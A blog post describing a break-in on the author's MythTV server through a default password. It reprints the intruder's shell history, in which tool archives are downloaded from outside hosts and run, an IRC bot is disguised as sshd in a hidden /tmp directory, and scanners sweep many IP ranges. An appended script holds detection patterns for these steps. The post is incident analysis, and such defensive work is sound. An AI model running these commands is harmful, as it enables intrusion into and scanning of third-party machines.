johnsu01 (johnsu01) wrote,

Me and the script kiddies

I woke up on the couch very early this morning, like around 4:30ish, after falling asleep trying to watch Kill Bill 1. I decided in my half-dazed state to check the disk space on one of my servers before going to bed, because it's been getting pretty close to full. I logged into the machine and typed last. Up came a login by user mythtv from a few days ago.

That's funny, because I sure didn't log in as mythtv any time recently, and I'm ostensibly the only one allowed to log into this machine.

mythtv was not logged in at that moment. But there was an sshd process running owned by mythtv. I checked the auth log, and sure enough, mythtv had logged in with a password. It was not in the middle of any other break-in attempts; just one successful login. It was probably because I, ahem, left the password at the default. I would not have done that intentionally, but I might have done it nonetheless.

So, long story short, someone got access to one of my machines for a few days. They didn't do anything to the machine, and I'm pretty certain after doing standard verification things that I was not rooted. They didn't send any mail out. They just ran an instance of EnergyMech, which they had renamed to sshd, probably for the same reason that they installed all this stuff in /tmp/.../. Yes, .... I admit I missed it the first time looking. The instance spawned 3 bots, who then logged into 3 different irc servers.

Since they didn't seem to be doing anything harmful, and because I was curious and wanted to learn from this incident, I ran tethereal all day and recorded their traffic. I now have an awful lot of people's (or other bots'?) undernet passwords, and some conversations in Romanian. I'm not sure yet what to do with this information. If any of you speak what they speak in Romania and would like to translate some log files, let me know.

I'll post some more details about this later. Some of you will find the ~/.bash_history file entertaining, so I'll include that here. I also killed and restarted the EnergyMech in debug mode, and logged that for a while.

The question remains how they knew right off the bat that I was running mythtv. I have three theories at the moment. One is that they could be combing freenode's #mythtv-users channel for IPs, because it is publicly logged, and I have been there before (although normally my IP is obscured by my cloak). Second is that there has been some kind of compromise that allows them to monitor connections to the servers that myth boxes talk to in order to fill their database with channel info. Third is that they just got really lucky, and got in on the first try with a list of default users and passwords. I suppose there is the fourth possibility that they doctored the logs and actually exploited something to get in, but it doesn't look like that to me.

Obviously I will comb the bot and traffic logs for IPs and try to notify people that their machines have been compromised. Anything else I should do?

You'll see that they did some port scanning too. I'm not sure yet what all these strangely named binaries do, other than scan. They probably ran some more cracking attempts on other machines. They tried to set up a PHP cgi-bin script that lets them execute shell commands.

Among the artifacts they left lying around are files of common passwords and usernames. But mythtv does not appear in any of these files.

They also ran mythtv-setup, which is downright bizarre. Maybe they were expecting X forwarding to be enabled (it's not). If that's the case, then that lends credibility to the theory that this is a mythtv-specific effort.

w
passwd
uname -a
ls
/etc/rc.d/init.d/httpd status
/etc/rc.d/init.d/sendmail status
 php -v
ps aux
cd .X11-unix
cd X11
cd /tmp/.X11-unix
ls
tar xzvf boti.tgz
rm -rf boti.tgz
cd mech
mv mech httpd
export PATH=:PATH
httpd
uname -a
w
mkdir public_html
ls
cd public_html
/etc/rc.d/init.d/sendmail status
/etc/rc.d/init.d/httpd status
uname -a
ps aux
w
mythtv-setup
w
w
uname -a
cd /tmp
mkdir ...
cd ...
ftp 202.50.176.69
tar xzvf boti.tgz
rm -rf boti.tgz
cd mech
mv mech httpd
export PATH=:PATH
httpd
wget www.fpt.uv.ro/scan/rooteam.tar.gz 
cd /tmp
wget www.fpt.uv.ro/scan/rooteam.tar.gz 
tar -zxvf rooteam.tar.gz 
cd rooteam 
chmod +x * 
./auto 
mv unix assh 
chmod +x * 
./211
w
cd /tmp
ls
cd rooteam
ls
rm -rf 211  211.21.find.22 
chmod +x * 
 ./unix 24.16
./assh 24.16
./assh 24.17
./assh 24.18
./assh 24.19
./assh 24.20
 ./assh 24.21
./assh 24.22
./assh 24.23
 ./assh 24.24
 ./assh 24.25
./assh 24.26
./assh 24.27
 ./assh 24.28
 ./assh 24.29
 ./assh 24.30
./assh 24.31
./assh 24.32
./assh 24.33
 ./assh 24.34
./assh 24.35
./assh 24.36
./assh 24.37
./assh 24.38
./assh 24.39
./assh 24.40
./assh 24.41
./assh 24.42
./assh 24.43
 ./assh 24.44
cd /tmp
ls
rm -rf rooteam  
rm -rf rooteam.tar.gz 
wget www.fpt.uv.ro/scan/ssteam2.tgz
tar -zxvf ssteam2.tgz 
cd ssteam2 
chmod +x * 
./start 66.92
ls
./samba
ls
./samba 200.3
./o0o 
./o0o 200
./o0o 200.3
cd /tmp
ls
rm -rf ssteam2 ssteam2.tgz
wget www.fpt.uv.ro/scan/madiceman.tgz 
tar -zxvf madiceman.tgz 
cd madiceman 
chmod +x * 
./start 207.0
./start 207.1
./start 207.2
 ./start 216.69
 ./start 59.120
./start 59.121
./start 193.254
 ./start 211.234
./start 211.235
./start 61.74
./start 151.47
./start 193.147
./start 205.95
 ./start 138.217
cd /tmp
ls
rm -rf madiceman   madiceman.tgz
cd /var/tmp
ls
wget www.mihai22.as.ro/prv8.tgz
tar -xzvf prv8.tgz
cd ssh
./scan 67,0
 ./scan 67.0
 ./scan 66.90
./scan 216.130
 ./scan 206.212
./scan 200.118
./scan 66.130
uname -a
ps aux
w
cd /tmp
ls
wget franck.lydo.org/wtf.tar
tar xvf wtf.tar
cd wtf
./wtf 62.95
 ./wtf 212.174
 ./wtf 212.175
./wtf 212.176
./wtf 212.177
 ./wtf 83.146
 ./wtf 83.147
 ./wtf 137.132
 ./wtf 137.133
 ./wtf 137.134
 ./wtf 137.135
./wtf 137.136
 ./wtf 169.55
w
uname -a
ps aux
passwd
kill -9  29638 
cd /tmp
mkdir ...
cd ...
ls
rm -rf mech
wget www.ploiesti.cc/linux.tar.gz
tar -zxvf linux.tar.gz
cd http
cd kids
mv mech sshd
chmod +x *
PATH="." sshd
cd /tmp
wget www.ploiesti.cc/gov.tar
tar xvf gov.tar
rm -rf gov.tar
cd gov
chmod +x *
cat /proc/cpuinfo
./gov 61.150
./gov 61.151
 ./gov 61.152
 ./gov 61.153
./gov 61.154
./gov 61.155
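Added here as an illustration, not part of the original post or its logs: a small Python triage script that flags, in a recovered shell history, the patterns visible above (a binary renamed to a daemon name, hidden directories under /tmp, PATH tricks, tarball fetches into /tmp, the same scanner run against many /16 prefixes). The sample history is constructed to mirror those patterns; the address and hostname in it are placeholders.

```python
import re
from collections import Counter

# Constructed sample modelled on the patterns in the post's bash_history; it is
# not the recovered file, and the address/host below are placeholders.
SAMPLE_HISTORY = """\
uname -a
cd /tmp/.X11-unix
mv mech httpd
export PATH=:PATH
mkdir ...
cd ...
ftp 192.0.2.10
wget scanner.invalid/scan/rooteam.tar.gz
chmod +x *
./assh 24.16
./assh 24.17
./assh 24.18
./start 207.0
PATH="." sshd
ls
"""

# One rule per behaviour worth surfacing from a recovered history dump.
RULES = [
    ("rename-to-daemon", re.compile(r"^mv\s+\S+\s+(sshd|httpd|crond|syslogd)$")),
    ("hidden-dir",       re.compile(r"^(mkdir|cd)\s+(?:\S*/)?(\.{3,}|\.X11-unix)$")),
    ("fetch-archive",    re.compile(r"^(wget|curl|ftp)\s+")),
    ("path-hijack",      re.compile(r"PATH=(?:\"?\.|:)")),
    ("chmod-all",        re.compile(r"^chmod\s+\+x\s+\*$")),
]
# "./tool A.B" with a bare numeric prefix is the shape of a /16 sweep.
SWEEP_RE = re.compile(r"^\./(\S+)\s+\d{1,3}(?:[.,]\d{1,3})?$")


def triage(history, sweep_threshold=3):
    """Return per-line rule hits and the tools run against >= sweep_threshold prefixes."""
    hits, per_tool = [], Counter()
    for lineno, raw in enumerate(history.splitlines(), start=1):
        line = raw.strip()  # the dump has stray leading spaces, as in the post
        for name, rx in RULES:
            if rx.search(line):
                hits.append((lineno, name, line))
        m = SWEEP_RE.match(line)
        if m:
            per_tool[m.group(1)] += 1
    sweeps = {tool: n for tool, n in per_tool.items() if n >= sweep_threshold}
    return {"hits": hits, "sweeps": sweeps}
```

Run it over the real history (`triage(open(path).read())`) and the sweep counter alone tells you which tools were mass scanners and roughly how many /16 prefixes they covered, which is what you need when notifying the owners of the scanned ranges.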
Tags: crack, mythtv, security